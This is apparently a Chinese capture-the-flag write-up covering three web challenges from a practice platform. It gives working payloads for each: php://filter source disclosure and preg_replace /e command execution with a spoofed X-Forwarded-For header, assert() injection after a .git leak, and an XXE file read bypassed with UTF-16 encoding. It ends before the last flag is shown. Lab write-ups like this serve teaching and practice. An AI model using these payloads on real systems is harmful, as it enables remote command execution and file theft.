攻防世界web解题[进阶]（六）

介绍:记录解题过程

19.ics-05(php://filter 的使用)

题目描述：其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统

• 参考
  php://filter 的使用

• 首页:
  

• /index.php:
  
  <1>. 查看/index.php源码:
  

<2>. 可能存在文件包含读源码的漏洞，尝试读取index.php的页面源码

/index.php?page=php://filter/read=convert.base64-encode/resource=index.php

<3>. base64反编码得到的代码中php部分的代码:

......

//方便的实现输入输出的功能,正在开发中的功能，只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }
}
?>
</body>
</html>

<4>. 修改ip地址为127.0.0.1

X-Forwarded-For:127.0.0.1

<5>. 利用三个参数(主要是rep,另两个存在),查看当前目录文件:

/index.php?pat=/test/e&rep=system("ls")&sub=test

<5>.进入s3chahahaDir目录,并查看当前目录文件

/index.php?pat=/test/e&rep=system("cd+s3chahahaDir+%26%26+ls")&sub=test

• 重要回显:

<br >Welcome My Admin ! <br >flag

<6>.进入s3chahahaDir/flag目录,并查看当前目录文件:

/index.php?pat=/test/e&rep=system("cd+s3chahahaDir/flag+%26%26+ls")&sub=test

• 重要回显:

<br >Welcome My Admin ! <br >flag.php

<7>.查看flag.php文件内容,得到flag:

/index.php?pat=/test/e&rep=system("cat+s3chahahaDir/flag/flag.php")&sub=test

• 重要回显(flag):

<br >Welcome My Admin ! <br ><?php

$flag = 'cyberpeace{5522b5652193faf3bbc1ea1ae127ac97}';

?>

20.mfw

题目描述：暂无

• 查看/index.php源码(部分)

<div id="navbar" class="collapse navbar-collapse">
	<ul class="nav navbar-nav">
	<li ><a href="?page=home">Home</a></li>
	<li ><a href="?page=about">About</a></li>
	<li ><a href="?page=contact">Contact</a></li>
	<!--<li class="active"><a href="?page=flag">My secrets</a></li> -->
</ul>
</div>

<1>.访问http://111.200.241.244:33411/index.php?page=flag

<2>.可能是Git了泄漏

<3>.查看/.git/

http://111.200.241.244:33411/.git/

<4>.用githack扫描并下载网址源码

......\GitHack-master>python2 githack.py http://111.200.241.244:33411/.git/
[+] Download and parse index file ...
index.php
templates/about.php
templates/contact.php
templates/flag.php
templates/home.php
[OK] index.php
[OK] templates/about.php
[OK] templates/contact.php
[OK] templates/flag.php
[OK] templates/home.php

<5>.查看index.php,说明flag就在templates/flag.php:

<?php
// TODO
// $FLAG = '';
?>

<6>.查看templates/home.php的php代码:

<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>

• 这里有个函数:

assert()

assert这个函数在php语言中是用来判断一个表达式是否成立,可用来执行任意命令

<6>. 读取/templates/flag.php文件的payload:

http://111.200.241.244:33411/?page='.system(%22cat%20./templates/flag.php%22).'

<7>.flag:

<?php $FLAG="cyberpeace{e9fa30bf97b6c1513e34380724621a09}"; ?>
<?php $FLAG="cyberpeace{e9fa30bf97b6c1513e34380724621a09}"; ?>
That file doesn't exist!

21.unagi(XXE编码转换为UTF-16绕过)

题目描述：暂无

• 这里可以上传一个新用户:
  

• 访问http://111.200.241.244:45573/about.php

Flag is located at /flag, come get it

• payload(XML):

<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>bob</username>
        <password>passwd2</password>
        <name> Bob</name>
        <email>bob@fakesite.com</email>  
        <group>CSAW2019</group>
        <intro>&xxe;</intro>
    </user>
</users>

• XXE编码转换为UTF-16绕过

iconv -f utf8 -t utf16 a.xml>1.xml

• 上传1.xml文件,得到flag: